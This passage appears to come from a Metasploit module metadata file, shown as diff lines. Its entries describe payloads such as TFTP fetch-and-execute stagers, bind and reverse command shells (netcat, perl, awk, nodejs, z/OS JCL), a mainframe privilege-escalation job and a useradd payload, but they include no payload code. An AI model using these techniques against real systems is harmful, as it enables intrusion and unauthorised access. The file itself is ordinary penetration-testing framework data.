server.\nSpawn a command shell (staged).\n\nListen for a connection (Linux x86)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/shell/bind_tcp", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_tcp" - }, - "payload_cmd/linux/tftp/x86/shell/bind_tcp_uuid": { - "name": "TFTP Fetch, Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)", - "fullname": "payload/cmd/linux/tftp/x86/shell/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "egypt ", - "OJ Reeves" - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nListen for a connection with UUID Support (Linux x86)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/shell/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/shell/bind_tcp_uuid", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/bind_tcp_uuid" - }, - "payload_cmd/linux/tftp/x86/shell/find_tag": { - "name": "TFTP Fetch, Linux Command Shell, Find Tag Stager", - "fullname": "payload/cmd/linux/tftp/x86/shell/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nUse an established connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/shell/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/shell/find_tag", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/find_tag" - }, - "payload_cmd/linux/tftp/x86/shell/reverse_ipv6_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Stager (IPv6)", - "fullname": "payload/cmd/linux/tftp/x86/shell/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "kris katterjohn " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nConnect back to attacker over IPv6", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/shell/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/shell/reverse_ipv6_tcp", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/reverse_ipv6_tcp" - }, - "payload_cmd/linux/tftp/x86/shell/reverse_nonx_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/tftp/x86/shell/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/shell/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/shell/reverse_nonx_tcp", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/reverse_nonx_tcp" - }, - "payload_cmd/linux/tftp/x86/shell/reverse_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/tftp/x86/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "egypt ", - "tkmru" - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/shell/reverse_tcp", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/reverse_tcp" - }, - "payload_cmd/linux/tftp/x86/shell/reverse_tcp_uuid": { - "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/tftp/x86/shell/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape ", - "egypt ", - "OJ Reeves" - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/shell/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/shell/reverse_tcp_uuid", - "staged": true, - "stage_refname": "linux/x86/shell", - "stager_refname": "linux/x86/reverse_tcp_uuid" - }, - "payload_cmd/linux/tftp/x86/shell_bind_ipv6_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Bind TCP Inline (IPv6)", - "fullname": "payload/cmd/linux/tftp/x86/shell_bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "kris katterjohn " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nListen for a connection over IPv6 and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/shell_bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/shell_bind_ipv6_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/x86/shell_bind_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/linux/tftp/x86/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Ramon de C Valle " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nListen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/x86/shell_bind_tcp_random_port": { - "name": "TFTP Fetch, Linux Command Shell, Bind TCP Random Port Inline", - "fullname": "payload/cmd/linux/tftp/x86/shell_bind_tcp_random_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Geyslan G. Bem ", - "Aleh Boitsau " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\n\n Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.", - "references": [ - "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port.asm", - "EDB-41631" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/shell_bind_tcp_random_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/shell_bind_tcp_random_port", - "staged": false - }, - "payload_cmd/linux/tftp/x86/shell_find_port": { - "name": "TFTP Fetch, Linux Command Shell, Find Port Inline", - "fullname": "payload/cmd/linux/tftp/x86/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Ramon de C Valle " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a shell on an established connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/shell_find_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/shell_find_port", - "staged": false - }, - "payload_cmd/linux/tftp/x86/shell_find_tag": { - "name": "TFTP Fetch, Linux Command Shell, Find Tag Inline", - "fullname": "payload/cmd/linux/tftp/x86/shell_find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "skape " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nSpawn a shell on an established connection (proxy/NAT safe)", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/shell_find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/shell_find_tag", - "staged": false - }, - "payload_cmd/linux/tftp/x86/shell_reverse_tcp": { - "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/tftp/x86/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Ramon de C Valle ", - "joev " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nConnect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/tftp/x86/shell_reverse_tcp_ipv6": { - "name": "TFTP Fetch, Linux Command Shell, Reverse TCP Inline (IPv6)", - "fullname": "payload/cmd/linux/tftp/x86/shell_reverse_tcp_ipv6", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Matteo Malvica " - ], - "description": "Fetch and execute a x86 payload from a TFTP server.\nConnect back to attacker and spawn a command shell over IPv6", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/tftp/x86.rb", - "is_install_path": true, - "ref_name": "cmd/linux/tftp/x86/shell_reverse_tcp_ipv6", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/tftp/x86", - "adapted_refname": "linux/x86/shell_reverse_tcp_ipv6", - "staged": false - }, - "payload_cmd/mainframe/apf_privesc_jcl": { - "name": "JCL to Escalate Privileges", - "fullname": "payload/cmd/mainframe/apf_privesc_jcl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Bigendian Smalls", - "Ayoub" - ], - "description": "Elevate privileges for user. Adds\n SYSTEM SPECIAL and BPX.SUPERUSER to user profile. Does this by using\n an unsecured/updateable APF authorized library (APFLIB) and updating\n the user's ACEE using this program/library. Note: This privesc only\n works with z/OS systems using RACF, no other ESM is supported.", - "references": [], - "platform": "Mainframe", - "arch": "cmd", - "rport": 21, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/mainframe/apf_privesc_jcl.rb", - "is_install_path": true, - "ref_name": "cmd/mainframe/apf_privesc_jcl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/mainframe/bind_shell_jcl": { - "name": "Z/OS (MVS) Command Shell, Bind TCP", - "fullname": "payload/cmd/mainframe/bind_shell_jcl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Bigendian Smalls" - ], - "description": "Provide JCL which creates a bind shell\n This implementation does not include ebcdic character translation,\n so a client with translation capabilities is required. MSF handles\n this automatically.", - "references": [], - "platform": "Mainframe", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/mainframe/bind_shell_jcl.rb", - "is_install_path": true, - "ref_name": "cmd/mainframe/bind_shell_jcl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/mainframe/generic_jcl": { - "name": "Generic JCL Test for Mainframe Exploits", - "fullname": "payload/cmd/mainframe/generic_jcl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Bigendian Smalls" - ], - "description": "Provide JCL which can be used to submit\n a job to JES2 on z/OS which will exit and return 0. This\n can be used as a template for other JCL based payloads", - "references": [], - "platform": "Mainframe", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/mainframe/generic_jcl.rb", - "is_install_path": true, - "ref_name": "cmd/mainframe/generic_jcl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/mainframe/reverse_shell_jcl": { - "name": "Z/OS (MVS) Command Shell, Reverse TCP", - "fullname": "payload/cmd/mainframe/reverse_shell_jcl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Bigendian Smalls" - ], - "description": "Provide JCL which creates a reverse shell\n This implementation does not include ebcdic character translation,\n so a client with translation capabilities is required. MSF handles\n this automatically.", - "references": [], - "platform": "Mainframe", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/mainframe/reverse_shell_jcl.rb", - "is_install_path": true, - "ref_name": "cmd/mainframe/reverse_shell_jcl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/adduser": { - "name": "Add user with useradd", - "fullname": "payload/cmd/unix/adduser", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Nick Cottrell " - ], - "description": "Creates a new user. By default the new user is set with sudo\n but other options exist to make the new user automatically\n root but this is not automatically set since the new user will\n be treated as root (and login may be difficult). The new user\n can also be set as just a standard user if desired.", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-01 12:30:26 +0000", - "path": "/modules/payloads/singles/cmd/unix/adduser.rb", - "is_install_path": true, - "ref_name": "cmd/unix/adduser", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/bind_awk": { - "name": "Unix Command Shell, Bind TCP (via AWK)", - "fullname": "payload/cmd/unix/bind_awk", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "espreto ", - "Ulisses Castro " - ], - "description": "Listen for a connection and spawn a command shell via GNU AWK", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/bind_awk.rb", - "is_install_path": true, - "ref_name": "cmd/unix/bind_awk", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/bind_aws_instance_connect": { - "name": "Unix SSH Shell, Bind Instance Connect (via AWS API)", - "fullname": "payload/cmd/unix/bind_aws_instance_connect", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Creates an SSH shell using AWS Instance Connect", - "references": [ - "URL-https://www.sempervictus.com/single-post/a-serial-case-of-air-on-the-side-channel" - ], - "platform": "Unix", - "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-07-24 16:42:43 +0000", - "path": "/modules/payloads/singles/cmd/unix/bind_aws_instance_connect.rb", - "is_install_path": true, - "ref_name": "cmd/unix/bind_aws_instance_connect", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/bind_busybox_telnetd": { - "name": "Unix Command Shell, Bind TCP (via BusyBox telnetd)", - "fullname": "payload/cmd/unix/bind_busybox_telnetd", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Matthew Kienow " - ], - "description": "Listen for a connection and spawn a command shell via BusyBox telnetd", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/bind_busybox_telnetd.rb", - "is_install_path": true, - "ref_name": "cmd/unix/bind_busybox_telnetd", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/bind_inetd": { - "name": "Unix Command Shell, Bind TCP (inetd)", - "fullname": "payload/cmd/unix/bind_inetd", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Listen for a connection and spawn a command shell (persistent)", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/bind_inetd.rb", - "is_install_path": true, - "ref_name": "cmd/unix/bind_inetd", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/bind_jjs": { - "name": "Unix Command Shell, Bind TCP (via jjs)", - "fullname": "payload/cmd/unix/bind_jjs", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "conerpirate", - "bcoles " - ], - "description": "Listen for a connection and spawn a command shell via jjs", - "references": [ - "URL-https://gtfobins.github.io/gtfobins/jjs/", - "URL-https://cornerpirate.com/2018/08/17/java-gives-a-shell-for-everything/", - "URL-https://h4wkst3r.blogspot.com/2018/05/code-execution-with-jdk-scripting-tools.html" - ], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/bind_jjs.rb", - "is_install_path": true, - "ref_name": "cmd/unix/bind_jjs", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/bind_lua": { - "name": "Unix Command Shell, Bind TCP (via Lua)", - "fullname": "payload/cmd/unix/bind_lua", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "xistence " - ], - "description": "Listen for a connection and spawn a command shell via Lua", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/bind_lua.rb", - "is_install_path": true, - "ref_name": "cmd/unix/bind_lua", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/bind_netcat": { - "name": "Unix Command Shell, Bind TCP (via netcat)", - "fullname": "payload/cmd/unix/bind_netcat", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "m-1-k-3", - "egypt ", - "juan vazquez " - ], - "description": "Listen for a connection and spawn a command shell via netcat", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/bind_netcat.rb", - "is_install_path": true, - "ref_name": "cmd/unix/bind_netcat", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/bind_netcat_gaping": { - "name": "Unix Command Shell, Bind TCP (via netcat -e)", - "fullname": "payload/cmd/unix/bind_netcat_gaping", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Listen for a connection and spawn a command shell via netcat", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb", - "is_install_path": true, - "ref_name": "cmd/unix/bind_netcat_gaping", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/bind_netcat_gaping_ipv6": { - "name": "Unix Command Shell, Bind TCP (via netcat -e) IPv6", - "fullname": "payload/cmd/unix/bind_netcat_gaping_ipv6", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "hdm " - ], - "description": "Listen for a connection and spawn a command shell via netcat", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb", - "is_install_path": true, - "ref_name": "cmd/unix/bind_netcat_gaping_ipv6", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/bind_nodejs": { - "name": "Unix Command Shell, Bind TCP (via nodejs)", - "fullname": "payload/cmd/unix/bind_nodejs", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "joev " - ], - "description": "Continually listen for a connection and spawn a command shell via nodejs", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/bind_nodejs.rb", - "is_install_path": true, - "ref_name": "cmd/unix/bind_nodejs", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/bind_perl": { - "name": "Unix Command Shell, Bind TCP (via Perl)", - "fullname": "payload/cmd/unix/bind_perl", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Samy ", - "cazz " - ], - "description": "Listen for a connection and spawn a command shell via perl", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/bind_perl.rb", - "is_install_path": true, - "ref_name": "cmd/unix/bind_perl", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/bind_perl_ipv6": { - "name": "Unix Command Shell, Bind TCP (via perl) IPv6", - "fullname": "payload/cmd/unix/bind_perl_ipv6", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Samy ", - "cazz " - ], - "description": "Listen for a connection and spawn a command shell via perl", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb", - "is_install_path": true, - "ref_name": "cmd/unix/bind_perl_ipv6", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_cmd/unix/bind_r": { - "name": "Unix Command Shell, Bind TCP (via R)", - "fullname": "payload/cmd/unix/bind_r", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "RageLtMan " - ], - "description": "Continually listen for a connection and spawn a command shell via R", - "references": [], - "platform": "Unix", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/cmd/unix/bind_r.rb", - "is_install_path": true, - 